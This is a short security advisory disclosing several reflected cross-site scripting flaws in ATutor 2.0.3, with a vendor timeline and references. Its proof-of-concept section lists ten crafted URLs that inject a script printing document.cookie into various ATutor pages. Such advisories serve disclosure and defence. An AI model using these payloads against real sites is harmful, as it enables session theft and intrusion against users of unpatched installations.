ATutor 2.0.3 Multiple XSS vulnerabilities

[sschurtz () darksecurity de]

Advisory:               ATutor 2.0.3 Multiple XSS vulnerabilities
Advisory ID:            SSCHADV2012-002
Author:                 Stefan Schurtz
Affected Software:      Successfully tested on ATutor 2.0.3
Vendor URL:             http://atutor.ca
Vendor Status:          informed

==========================
Vulnerability Description
==========================

ATutor 2.0.3 is prone to multiple XSS vulnerabilities

==================
PoC-Exploit
==================

http://[target]/ATutor/themes/default/tile_search/index.tmpl.php/"; <script>alert(document.cookie)</script>
http://[target]/ATutor/login.php/index.php"; <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/search.php/index.php"; <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/password_reminder.php"; <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/login.php/jscripts/infusion/"; <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/login.php/mods/_standard/flowplayer/"; <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/browse.php/jscripts/infusion/framework/fss/"; <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/registration.php/themes/default/ie_styles.css"; <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/about.php/"; <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/themes/default/social/basic_profile.tmpl.php/"; <script>alert(document.cookie)</script>/index.php

=========
Solution
=========

-

====================
Disclosure Timeline
====================

01-Jan-2012 - vendor informed
01-Jan-2012 - vendor feedback
15-Jan-2012 - no fix available

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://atutor.ca/view/3/22740/1.html
http://www.darksecurity.de/advisories/2012/SSCHADV2012-002.txt